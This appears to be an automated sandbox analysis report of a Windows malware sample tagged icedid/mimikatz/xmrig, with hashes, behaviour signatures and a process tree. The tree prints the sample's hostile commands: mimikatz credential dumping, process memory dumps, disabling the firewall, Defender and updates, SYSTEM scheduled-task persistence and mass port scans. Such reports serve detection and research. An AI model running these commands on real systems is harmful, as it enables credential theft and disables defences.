
Analysis

  • max time kernel
    110s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/12/2024, 00:47

Errors

Reason
Machine shutdown

General

  • Target

    2024-12-28_7b10f2277167220830c83305dd874683_hacktools_icedid_mimikatz.exe

  • Size

    6.9MB

  • MD5

    7b10f2277167220830c83305dd874683

  • SHA1

    f5c98fc90cbf6ac2b5d9ffe2348e8ec0b1ce238e

  • SHA256

    ca2e3244daf1dfbf881d9494252be413d4a0f4022089ffa8ca716f6edd798c24

  • SHA512

    e25145b07fa8295b1548c118e70cd8f805d4f448236925283fde43eb367e6d394a16aa32bca1f53bb19b9dd79fbda8c7731073276281a14e68acaeefeb11d57c

  • SSDEEP

    196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (11038) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 9 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 3 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on the host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2104
      • C:\Windows\TEMP\ltbmbiubv\ttittb.exe
        "C:\Windows\TEMP\ltbmbiubv\ttittb.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3108
    • C:\Users\Admin\AppData\Local\Temp\2024-12-28_7b10f2277167220830c83305dd874683_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-12-28_7b10f2277167220830c83305dd874683_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tmbllbvl\ibebikp.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2344
        • C:\Windows\tmbllbvl\ibebikp.exe
          C:\Windows\tmbllbvl\ibebikp.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4712
    • C:\Windows\tmbllbvl\ibebikp.exe
      C:\Windows\tmbllbvl\ibebikp.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3556
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1796
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:4220
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:3836
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
                PID:4840
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2376
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2612
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:2960
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1228
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3472
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:8
              • C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe
                C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3296
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2556
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                      PID:4860
                  • C:\Windows\SysWOW64\net.exe
                    net stop "TrueSight Meter"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2380
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop "TrueSight Meter"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3976
                  • C:\Windows\SysWOW64\net.exe
                    net stop npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3124
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3276
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                      PID:4820
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:4872
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1168
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4888
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1544
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2404
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:912
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                        PID:1600
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
                    2⤵
                      PID:4308
                      • C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe
                        C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:4932
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\buzcwvvny\Corporate\log.txt
                      2⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:4796
                      • C:\Windows\buzcwvvny\Corporate\vfshost.exe
                        C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3032
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
                      2⤵
                        PID:2376
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2316
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:4004
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2440
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3272
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1280
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2612
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4256
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3620
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4720
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3264
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:692
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1424
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3148
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:216
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1124
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:1000
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1924
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3500
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:384
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:324
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop SharedAccess
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1352
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                            PID:5000
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop SharedAccess
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4092
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh firewall set opmode mode=disable
                          2⤵
                            PID:1868
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh firewall set opmode mode=disable
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:3900
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c netsh Advfirewall set allprofiles state off
                            2⤵
                              PID:2732
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh Advfirewall set allprofiles state off
                                3⤵
                                • Modifies Windows Firewall
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Location Discovery: System Language Discovery
                                PID:3284
                            • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                              C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 776 C:\Windows\TEMP\buzcwvvny\776.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3568
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop MpsSvc
                              2⤵
                                PID:2344
                                • C:\Windows\SysWOW64\net.exe
                                  net stop MpsSvc
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1700
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop MpsSvc
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1280
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c net stop WinDefend
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:3928
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WinDefend
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3348
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WinDefend
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3272
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c net stop wuauserv
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1968
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  3⤵
                                    PID:4492
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3032
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config MpsSvc start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5080
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config MpsSvc start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2376
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config SharedAccess start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4396
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config SharedAccess start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3188
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config WinDefend start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:532
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WinDefend start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3672
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config wuauserv start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:968
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config wuauserv start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2988
                                • C:\Windows\TEMP\xohudmc.exe
                                  C:\Windows\TEMP\xohudmc.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4180
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 60 C:\Windows\TEMP\buzcwvvny\60.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2248
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2104 C:\Windows\TEMP\buzcwvvny\2104.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4228
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2644 C:\Windows\TEMP\buzcwvvny\2644.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2068
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2784 C:\Windows\TEMP\buzcwvvny\2784.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5052
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2836 C:\Windows\TEMP\buzcwvvny\2836.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3964
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3080 C:\Windows\TEMP\buzcwvvny\3080.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4348
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3824 C:\Windows\TEMP\buzcwvvny\3824.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2628
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3916 C:\Windows\TEMP\buzcwvvny\3916.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4324
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3984 C:\Windows\TEMP\buzcwvvny\3984.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2392
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4076 C:\Windows\TEMP\buzcwvvny\4076.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1796
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4196 C:\Windows\TEMP\buzcwvvny\4196.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3452
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 1596 C:\Windows\TEMP\buzcwvvny\1596.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4088
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3832 C:\Windows\TEMP\buzcwvvny\3832.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5016
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4380 C:\Windows\TEMP\buzcwvvny\4380.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3376
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4480 C:\Windows\TEMP\buzcwvvny\4480.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:8
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3476 C:\Windows\TEMP\buzcwvvny\3476.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1044
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4908 C:\Windows\TEMP\buzcwvvny\4908.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3296
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c C:\Windows\buzcwvvny\mmzbiruiz\scan.bat
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4312
                                  • C:\Windows\buzcwvvny\mmzbiruiz\lubvuzbtm.exe
                                    lubvuzbtm.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                    3⤵
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    PID:800
                               • C:\Windows\SysWOW64\cusoqc.exe
                                 C:\Windows\SysWOW64\cusoqc.exe
                                 1⤵
                                 • Executes dropped EXE
                                 • System Location Discovery: System Language Discovery
                                 • Suspicious use of SetWindowsHookEx
                                 PID:2924
                               • C:\Windows\system32\cmd.EXE
                                 C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
                                 1⤵
                                 PID:3992
                                 • C:\Windows\system32\cmd.exe
                                   C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                   2⤵
                                   PID:1612
                                 • C:\Windows\system32\cacls.exe
                                   cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
                                   2⤵
                                   PID:4416
                               • C:\Windows\system32\cmd.EXE
                                 C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
                                 1⤵
                                 PID:1968
                                 • C:\Windows\system32\cmd.exe
                                   C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                   2⤵
                                   PID:1468
                                 • C:\Windows\system32\cacls.exe
                                   cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
                                   2⤵
                                   PID:4408
                               • C:\Windows\system32\cmd.EXE
                                 C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ibebikp.exe
                                 1⤵
                                 PID:4980
                                 • C:\Windows\ime\ibebikp.exe
                                   C:\Windows\ime\ibebikp.exe
                                   2⤵
                                   • Executes dropped EXE
                                   • Suspicious use of SetWindowsHookEx
                                   PID:2556

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Downloads

                                            • C:\Windows\SysWOW64\Packet.dll

                                              Filesize

                                              95KB

                                              MD5

                                              86316be34481c1ed5b792169312673fd

                                              SHA1

                                              6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                              SHA256

                                              49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                              SHA512

                                              3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                            • C:\Windows\SysWOW64\wpcap.dll

                                              Filesize

                                              275KB

